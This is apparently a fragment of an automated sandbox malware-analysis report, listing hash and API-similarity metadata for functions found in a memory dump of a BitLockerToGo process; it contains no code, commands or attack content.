                                                                                                                                                                  • String ID: f
                                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                                  • Opcode ID: fab7f4302ee6a13f238d7dc2bdf6daeab90a8e89cc9c07123dffbed442e34018
                                                                                                                                                                  • Instruction ID: 249047abe597261eb0c9e93433a019f52bb5b79c3be46d414096272699d2fed5
                                                                                                                                                                  • Opcode Fuzzy Hash: fab7f4302ee6a13f238d7dc2bdf6daeab90a8e89cc9c07123dffbed442e34018
                                                                                                                                                                  • Instruction Fuzzy Hash: E212BE71608341AFD754CF18D880A2BBBE2EBC8718F588AADF89587791D731DC04CB92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %1.17g
                                                                                                                                                                  • API String ID: 0-1551345525
                                                                                                                                                                  • Opcode ID: 564d6ac4a6176eb9bf1e64f579638e0ae758e6f85fb3fde78b478efce5f8fd10
                                                                                                                                                                  • Instruction ID: e3d6b0240a419093ac68a310b72d41493c7c2a11ece4376a469d163994bf2eeb
                                                                                                                                                                  • Opcode Fuzzy Hash: 564d6ac4a6176eb9bf1e64f579638e0ae758e6f85fb3fde78b478efce5f8fd10
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D0209B6A083418BE7258E19C44032BFBE2EFE0398F99C56DDE998B341E771D945C781
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(02D1CB80,00000000,00000001,02D1CB70), ref: 02CF6659
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                  • Opcode ID: 4b468561f77ba6bd5f489559f709e8507db9d1afd722221570fe7b55113decb9
                                                                                                                                                                  • Instruction ID: 631719434d47e6d27816a13e8a97b33b39a32df2435c67a76f65b4aac887b8aa
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b468561f77ba6bd5f489559f709e8507db9d1afd722221570fe7b55113decb9
                                                                                                                                                                  • Instruction Fuzzy Hash: EC51DFB1600204ABDBA09F24CC96B7773B8EF85368F244958FA95CB390F375E945C762
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: >PFz
                                                                                                                                                                  • API String ID: 0-1275006623
                                                                                                                                                                  • Opcode ID: 79725f800f0fbf78667d5e2252da664b139ae985496333cd3cf91ca1859e00b6
                                                                                                                                                                  • Instruction ID: f7950f1186d6dd8c56c1731e291a49c014794dc53e701154dc2c9d77d349649b
                                                                                                                                                                  • Opcode Fuzzy Hash: 79725f800f0fbf78667d5e2252da664b139ae985496333cd3cf91ca1859e00b6
                                                                                                                                                                  • Instruction Fuzzy Hash: F8F14E74405B808BD7328B359894BA3BBE0BF1B206F44199DD4EB9B3D3E325A805CF65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                  • Opcode ID: 3899840dd6577e7ca3d74759588182d0d0c4f5f9147254c434b95e4f40c5f024
                                                                                                                                                                  • Instruction ID: ebf4e8690476927b0aca72fa91fa229519a6d3fa996cf29326e02b5c06141288
                                                                                                                                                                  • Opcode Fuzzy Hash: 3899840dd6577e7ca3d74759588182d0d0c4f5f9147254c434b95e4f40c5f024
                                                                                                                                                                  • Instruction Fuzzy Hash: 14C125B2A083407BD725CE24C4D4B6FB7EAAB84315F09852DE5998B3E1E734DD44C792
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: P
                                                                                                                                                                  • API String ID: 0-3110715001
                                                                                                                                                                  • Opcode ID: a830e02f5fe9769212a35483d4b11db67bc995c07a06aabb79049acd1ecb86f1
                                                                                                                                                                  • Instruction ID: 0c54d238689a14dac77e94f31d0ce62f4e0476ca5acee5eab7c0d3c73aeb8ae1
                                                                                                                                                                  • Opcode Fuzzy Hash: a830e02f5fe9769212a35483d4b11db67bc995c07a06aabb79049acd1ecb86f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD1F3729082649FE725CE18E49071FB7E2EB85718F168A2CE8A5AB7D0C771DC45C7C1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -
                                                                                                                                                                  • API String ID: 0-2547889144
                                                                                                                                                                  • Opcode ID: bc0346d41aa82dc48f836a2e84bded1eadd7f03e369ed267d654814e52d14c91
                                                                                                                                                                  • Instruction ID: 1a495bc08441e041fdfb501c60f3341e032f65a9631652324b4e545b16b38cf6
                                                                                                                                                                  • Opcode Fuzzy Hash: bc0346d41aa82dc48f836a2e84bded1eadd7f03e369ed267d654814e52d14c91
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC13771A0C7118BC315CF28C89026ABBE3EFC1314F198A1EE6D65B3A5D734AA45CBC1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: a493fac295bc14b8a8112019caaffbfb44c950fdc5e9c3460a93f1d75309ad6b
                                                                                                                                                                  • Instruction ID: 5f322f25c5b64acbf083bd886573c49ad5e36e7d19caab5cdb18bfb0e33ca91a
                                                                                                                                                                  • Opcode Fuzzy Hash: a493fac295bc14b8a8112019caaffbfb44c950fdc5e9c3460a93f1d75309ad6b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C7116B1904200EBDB20AF18DC9267B73B5FF85354F094929E9968B791F7359B10C792
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 4`[b
• API String ID: 2994545307-3962175265
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $'&A
• API String ID: 0-4044571954
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 4`[b
• API String ID: 0-3962175265
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 4`[b
• API String ID: 0-3962175265
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 4`[b
• API String ID: 0-3962175265
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 0
• API String ID: 2994545307-4108050209
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: qrs
• API String ID: 0-4213175
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 4`[b
• API String ID: 2994545307-3962175265
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c381fa36c5bc9b07039ae166a9c0be2e2a170b7c5cc357c945c48d720f0d9494
                                                                                                                                                                  • Instruction ID: bb41904e55342ef75cbdb43431e2d4d7910b115a133d33422933918db561a9a9
                                                                                                                                                                  • Opcode Fuzzy Hash: c381fa36c5bc9b07039ae166a9c0be2e2a170b7c5cc357c945c48d720f0d9494
                                                                                                                                                                  • Instruction Fuzzy Hash: CD72E7B0508B819ED371CF3C8948787BFE5AB1A314F444A9DE0EE8B792D3756505CB62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 21239d803694c18d44292852bfcf32c35572c0fc2c412d04e0200f7bb212b936
                                                                                                                                                                  • Instruction ID: 3d0795f4fc17bab9496bfaf12371507256b7b6cab586ec807897265279ab7dd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 21239d803694c18d44292852bfcf32c35572c0fc2c412d04e0200f7bb212b936
                                                                                                                                                                  • Instruction Fuzzy Hash: FE52F9709087888FE734CB24C4847A7BBE1EF81318F16492ED6EB06B82D779E985C755
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1df4e4be7ba248b1ad4f2d7fb984b85423205a1a5e8fa6ca5bef0be816eb7a4b
                                                                                                                                                                  • Instruction ID: f1c67cd2c8cc3b90dceabb2fb318011f9efcff6994cc6c910f35490221a746ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 1df4e4be7ba248b1ad4f2d7fb984b85423205a1a5e8fa6ca5bef0be816eb7a4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 2252CE315083458FCB15CF29C0806AAFBE1BFC8318F598A6EE9995B341D774E989CB81
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9a63e3f7b3aa3187bece710034b5b288749fed9e00839a78e0bde3f8950479a2
                                                                                                                                                                  • Instruction ID: dcefe4bfbe783d84d42b60473530cc1ca95257f5b9e639e3d0bd430879d6ad45
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a63e3f7b3aa3187bece710034b5b288749fed9e00839a78e0bde3f8950479a2
                                                                                                                                                                  • Instruction Fuzzy Hash: E21266B46102409FD7358F28C880B26BBF2FF4A349F64484CE5C68B752E736A855CBA5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 87fa853598bdec29490406eb9f83ceec2725ac5b2eca457e76a53c10aa1b919a
                                                                                                                                                                  • Instruction ID: b11c19662ad4b167e4c4cf67a76376a8cfa2aa853e19cd0d2dae17358758a597
                                                                                                                                                                  • Opcode Fuzzy Hash: 87fa853598bdec29490406eb9f83ceec2725ac5b2eca457e76a53c10aa1b919a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1532F070514B118FC378CF29C59066AFBF2BB85610B944A2ED6A78BF90D736F849CB50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 45f40516d03e080300a34607671a2b77a14a68e7507698c8e96b957cbf3b1539
                                                                                                                                                                  • Instruction ID: a92705f6589387dd7daa9736dab1150a7df948d2b7695cf92c09e1eaa52fae4b
                                                                                                                                                                  • Opcode Fuzzy Hash: 45f40516d03e080300a34607671a2b77a14a68e7507698c8e96b957cbf3b1539
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF1CC366087418FC724CF29C88076BFBE2AFC9204F08982DE5D987751EB75E945CB96
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c7694968fa1101342b7e41153b1a6defc0a20dcd979e0de0e8264e9ad2da8954
                                                                                                                                                                  • Instruction ID: 9f5ef8763513f1d89c96e13c22ba05d41e2e91fcafdd3638afa8137e4da482f7
                                                                                                                                                                  • Opcode Fuzzy Hash: c7694968fa1101342b7e41153b1a6defc0a20dcd979e0de0e8264e9ad2da8954
                                                                                                                                                                  • Instruction Fuzzy Hash: 26F12232A1C241DFC724CF28E49052AB7E6FF99314F1A8AADD49887381D739DD65CB81
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4fd1e58d1dbabd116fcf9804dc0aadbf9641abe8526d6686ff306a217fcc661f
                                                                                                                                                                  • Instruction ID: 5b7b1597d4647a9495e68893cf7f7dc7aac51945a0f708ca48ddc80c2e3638ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd1e58d1dbabd116fcf9804dc0aadbf9641abe8526d6686ff306a217fcc661f
                                                                                                                                                                  • Instruction Fuzzy Hash: C4D13931A48385CFD364CF38D89076AB7E2AF96310F198A6DE6A5473D1D731DA58CB01
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 651177f851fbc3092b012b7070e4bef738d89b19f216cdc1eeca923fc0c3aa3d
                                                                                                                                                                  • Instruction ID: ed9de7c897bee1ebf8f728b1b3b5bcff4c5d27df1ceb3c5229f027bf8bfde6c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 651177f851fbc3092b012b7070e4bef738d89b19f216cdc1eeca923fc0c3aa3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BC1E075918351DFC3A58F28D890A2AF7E2FF95315F49892CE9D18B390D334E869CB81
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 7396e93ae33e5b22ebe9eef3f46821f30ba0818aae7b4b8fd08e53a39f49e754
                                                                                                                                                                  • Instruction ID: 2ba965ca400fe868079fb4f8352eb8fe25d3758dddf24fe09eb267ddb4777e9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7396e93ae33e5b22ebe9eef3f46821f30ba0818aae7b4b8fd08e53a39f49e754
                                                                                                                                                                  • Instruction Fuzzy Hash: A1B1F1716083059BD7949F15C89072BB7E2EFD9358F18492CEACA8B391E735EE04CB52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8aca2378bba58e80f9ff25dabdfb1e58a52b813a387e63c464d9c63657b1c144
                                                                                                                                                                  • Instruction ID: d8452aa466f8bb04eaa0f67e8c3562fb3fc1ca82f1f09b629083f877dabdfa7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 8aca2378bba58e80f9ff25dabdfb1e58a52b813a387e63c464d9c63657b1c144
                                                                                                                                                                  • Instruction Fuzzy Hash: 54B1C371A083406BE714DA19EC40B6BF7E6EBC4718F08492DE998D7765EB34DD04CB52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6b0590869f7e472a4fc1840ce596b24efcccd291cbc8f73edd6f1921e6473e09
                                                                                                                                                                  • Instruction ID: 531efb59002d29fd0671224b9efbbd4811e4b26047c205f140755f694b246822
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b0590869f7e472a4fc1840ce596b24efcccd291cbc8f73edd6f1921e6473e09
                                                                                                                                                                  • Instruction Fuzzy Hash: FCC14BB2A487418FC360CF68DC86B9BB7E1FB85318F09892CD299C7341E779A155CB45
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8e7193350ecfcd91a8b24fbb30b7ded7fc03a59529d9d29c52b2846a1f5f0760
                                                                                                                                                                  • Instruction ID: 6f28b9b148476221cf0b65b98d2f73fcb6a8946b5ef985680cca921b3e971e41
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e7193350ecfcd91a8b24fbb30b7ded7fc03a59529d9d29c52b2846a1f5f0760
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AA1CE32E59106DBCB18CF68E4816AEBBF2FB4A314F198569D845E7381C738DD50CB90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c89cbbae6080b897795ba868420088b9ca5705a8f5494533a875fa2fabb0191b
                                                                                                                                                                  • Instruction ID: 28809242f077f8fa2fd43d2381955a98943efc9967d710f26c8a740cc37279e9
                                                                                                                                                                  • Opcode Fuzzy Hash: c89cbbae6080b897795ba868420088b9ca5705a8f5494533a875fa2fabb0191b
                                                                                                                                                                  • Instruction Fuzzy Hash: FB81BF74209301ABD724DF28E8A0A6BB7E1FF89744F55891CE985CB791E731EC50CB52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 864a930cc9daf9115f175a838d19c1e3022b1a0e6d18542e50f45930f0712f7a
                                                                                                                                                                  • Instruction ID: b4bca98f86b6033cdce7f55268d18e3a484bdfa0a670d4710150e871b01f0fd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 864a930cc9daf9115f175a838d19c1e3022b1a0e6d18542e50f45930f0712f7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C91DD75A4C240DFD354DF28E49061AB7E1FB9A315F0A8CACD98997740D339EC68DB41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e7b767010893ddeb202bda9b0e063cf16f0f3bfb930368979203e84db47568c
                                                                                                                                                                  • Instruction ID: cd8826f0d0f592f2358e3d0b1268f6add7f3ef89eccceac6d8d0e5111bf0ca64
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e7b767010893ddeb202bda9b0e063cf16f0f3bfb930368979203e84db47568c
                                                                                                                                                                  • Instruction Fuzzy Hash: F2917D75A08202DFE754DF24E890B6AB3E9FF98315F0A496CE98587340D734ED68CB51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9380399e4221f45d27ebcc32b32b6c74f211ffa1afc729d0fd3acc038a03579c
                                                                                                                                                                  • Instruction ID: e82d1e4483ea7703aa5896562e591d33cbe682d0e1a7d7391a3b22134bd89288
                                                                                                                                                                  • Opcode Fuzzy Hash: 9380399e4221f45d27ebcc32b32b6c74f211ffa1afc729d0fd3acc038a03579c
                                                                                                                                                                  • Instruction Fuzzy Hash: 17916A35A18202DFE754DF28E89076AB3E9FF98316F0A486CE98587341D734ED68CB51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
